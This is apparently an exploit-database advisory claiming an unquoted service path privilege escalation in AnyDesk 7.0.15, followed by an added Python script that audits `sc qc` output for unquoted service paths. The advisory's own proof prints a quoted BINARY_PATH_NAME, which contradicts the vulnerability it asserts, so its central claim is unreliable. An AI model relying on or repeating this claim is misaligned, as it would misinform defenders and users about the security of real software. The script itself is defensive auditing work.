AnyDesk 7.0.15 Unquoted Service Path
AnyDesk version 7.0.15 suffers from an unquoted service path vulnerability.
# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path Privilege Escalation
# Date: 2024-04-01
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: http://anydesk.com
# Software Link: http://anydesk.com/download
# Version: Software Version 7.0.15
# Tested on: Windows 10 Pro x64

1. Description:

AnyDesk installs as a service with an unquoted service path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.

2. Proof

C:\>sc qc anydesk
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: anydesk
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AnyDesk Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation
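
A defender-side check for the condition described above, as an added example that is not part of the original advisory: it extracts BINARY_PATH_NAME from `sc qc` text, reports whether the executable path is quoted, and for an unquoted path with spaces lists the locations to inspect and the quoted form to set. The function names and both sample excerpts are constructed for illustration; the first reuses the path value printed in the proof, the second is a hypothetical unquoted variant of it.

```python
import re

# Constructed `sc qc` excerpts. PAGE_SAMPLE reuses the BINARY_PATH_NAME printed in
# the proof above; UNQUOTED_SAMPLE is a hypothetical unquoted variant of it.
PAGE_SAMPLE = r'''SERVICE_NAME: anydesk
        BINARY_PATH_NAME   : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
        SERVICE_START_NAME : LocalSystem'''
UNQUOTED_SAMPLE = r'''SERVICE_NAME: anydesk
        BINARY_PATH_NAME   : C:\Program Files (x86)\AnyDesk\AnyDesk.exe --service
        SERVICE_START_NAME : LocalSystem'''

def binary_path_from_sc_qc(text):
    """Extract the BINARY_PATH_NAME value from `sc qc` output."""
    m = re.search(r'^\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$', text, re.MULTILINE)
    if not m:
        raise ValueError("no BINARY_PATH_NAME line found")
    return m.group(1)

def split_image_path(value):
    """Return (quoted, exe_path, args) for a service image path."""
    if value.startswith('"'):
        end = value.find('"', 1)
        if end == -1:
            raise ValueError("unterminated quote in image path")
        return True, value[1:end], value[end + 1:].strip()
    # Unquoted: assume the executable ends at the first ".exe" followed by
    # whitespace or end of string (an assumption; other extensions are not handled).
    m = re.match(r'(.*?\.exe)(?=\s|$)', value, re.IGNORECASE)
    exe = m.group(1) if m else value
    return False, exe, value[len(exe):].strip()

def audit(text):
    """Classify one service and describe what to inspect and how to fix it."""
    quoted, exe, args = split_image_path(binary_path_from_sc_qc(text))
    at_risk = (not quoted) and " " in exe
    # For an unquoted path Windows tries each space-delimited prefix plus ".exe";
    # these are the locations to inspect for unexpected files and weak ACLs.
    inspect = [exe[:i] + ".exe" for i, c in enumerate(exe) if c == " "] if at_risk else []
    fixed = f'"{exe}"' + (f" {args}" if args else "")
    return {"quoted": quoted, "at_risk": at_risk, "inspect": inspect, "fixed": fixed}

if __name__ == "__main__":
    for name, sample in (("page", PAGE_SAMPLE), ("unquoted", UNQUOTED_SAMPLE)):
        print(name, audit(sample))
```
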